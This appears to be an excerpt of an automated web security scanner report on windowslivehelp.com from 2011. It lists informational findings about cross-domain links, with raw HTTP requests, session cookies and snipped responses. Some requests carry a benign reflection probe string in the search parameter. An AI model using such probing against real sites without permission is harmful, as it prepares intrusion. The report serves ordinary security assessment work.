GET /product.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1317651416674:ss=1317650370882
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:00:53 GMT Content-Length: 37711
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Profile Portal </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652054&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.8. http://windowslivehelp.com/product.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/product.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/product.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652081&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
GET /product.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://windowslivehelp.com/product.aspx?productid=13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319640947467:ss=1319640947467; fmshb=0,1319651749476; UTCOffset=-300; HVViewedTimes=3; LastProductId=13; ViewedTimes=3
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:01:20 GMT Content-Length: 37711
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Profile Portal </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652081&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.9. http://windowslivehelp.com/searchresults.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/searchresults.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/searchresults.aspx?query=
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653281&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3D&lc=1033&id=259655
Request
GET /searchresults.aspx?query= HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:21 GMT Connection: close Content-Length: 33007
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Search Results </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653281&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3D&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.10. http://windowslivehelp.com/searchresults.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/searchresults.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/searchresults.aspx?query=fe57b%3Ca%3Ee7ee0d33c0b
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319837254&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3Dfe57b%3Ca%3Ee7ee0d33c0b&lc=1033&id=259655
Request
GET /searchresults.aspx?query=fe57b%3Ca%3Ee7ee0d33c0b HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2 Accept: */* Referer: http://windowslivehelp.com/searchresults.aspx?query=fe57b%3Ca%3Ee7ee0d33c0b Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; UTCOffset=-300; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319642543020:ss=1319640947467; HVViewedTimes=7; ViewedTimes=7
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=9; path=/ Set-Cookie: ViewedTimes=9; path=/ X-Powered-By: ASP.NET Date: Fri, 28 Oct 2011 21:27:34 GMT Content-Length: 32965
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Search Results </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319837254&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3Dfe57b%3Ca%3Ee7ee0d33c0b&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.11. http://windowslivehelp.com/searchresults.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/searchresults.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/searchresults.aspx?query=fe57b%3Ca%3Ee7ee0d33c0b
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653346&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3Dfe57b%3Ca%3Ee7ee0d33c0b&lc=1033&id=259655
Request
GET /searchresults.aspx?query=fe57b%3Ca%3Ee7ee0d33c0b HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://windowslivehelp.com/searchresults.aspx?query=fe57b%3Ca%3Ee7ee0d33c0b Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; UTCOffset=-300; LastProductId=13; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319640953868:ss=1319640947467; HVViewedTimes=7; ViewedTimes=7; fmshb=0,1319653341497
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=9; path=/ Set-Cookie: ViewedTimes=9; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:22:25 GMT Content-Length: 32969
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Search Results </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653346&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3Dfe57b%3Ca%3Ee7ee0d33c0b&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.12. http://windowslivehelp.com/searchresults.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/searchresults.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/searchresults.aspx?query=cross%20site%20scripting
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319833698&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3Dcross%20site%20scripting&lc=1033&id=259655
Request
GET /searchresults.aspx?query=cross%20site%20scripting HTTP/1.1 Host: windowslivehelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://windowslivehelp.com/ Cookie: WT_FPC=id=50.23.123.106-2935047696.30165099:lv=1319822843839:ss=1319822726575; WT_NVR=0=/; HVViewedTimes=8; ViewedTimes=8; fmshb=0,1319833670030; UTCOffset=-300; ASP.NET_SessionId=3ubvi4b5mel3hcoagylkadqa
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=10; path=/ Set-Cookie: ViewedTimes=10; path=/ X-Powered-By: ASP.NET Date: Fri, 28 Oct 2011 20:28:18 GMT Content-Length: 33684
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Search Results </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319833698&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsearchresults.aspx%3Fquery%3Dcross%20site%20scripting&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.13. http://windowslivehelp.com/solution.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solution.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652087&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D848f023d-1637-4b6f-a7d4-ebb58ffdd9dc&lc=1033&id=259655
Request
GET /solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://windowslivehelp.com/product.aspx?productid=13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; UTCOffset=-300; HVViewedTimes=4; LastProductId=13; ViewedTimes=4; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319640950866:ss=1319640947467; fmshb=0,1319651751873
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:01:27 GMT Content-Length: 49540
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Windows Live Messenger 2009: How do I block or unblock contacts </title><meta http-equiv="content-type ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652087&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D848f023d-1637-4b6f-a7d4-ebb58ffdd9dc&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.14. http://windowslivehelp.com/solution.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solution.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652094&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D848f023d-1637-4b6f-a7d4-ebb58ffdd9dc&lc=1033&id=259655
Request
GET /solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://windowslivehelp.com/solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; UTCOffset=-300; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319640950866:ss=1319640947467; fmshb=0,1319651751873; HVViewedTimes=5; LastProductId=13; ViewedTimes=5
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:01:34 GMT Content-Length: 49540
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Windows Live Messenger 2009: How do I block or unblock contacts </title><meta http-equiv="content-type ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652094&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D848f023d-1637-4b6f-a7d4-ebb58ffdd9dc&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.15. http://windowslivehelp.com/solution.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solution.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/solution.aspx?solutionid=6ea0c7b3-1473-4176-b03f-145b951dcb41
The response contains the following links to other domains:- http://account.live.com/
- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://account.live.com/resetpassword.aspx
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653270&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D6ea0c7b3-1473-4176-b03f-145b951dcb41&lc=1033&id=259655
Request
GET /solution.aspx?solutionid=6ea0c7b3-1473-4176-b03f-145b951dcb41 HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:09 GMT Connection: close Content-Length: 36240
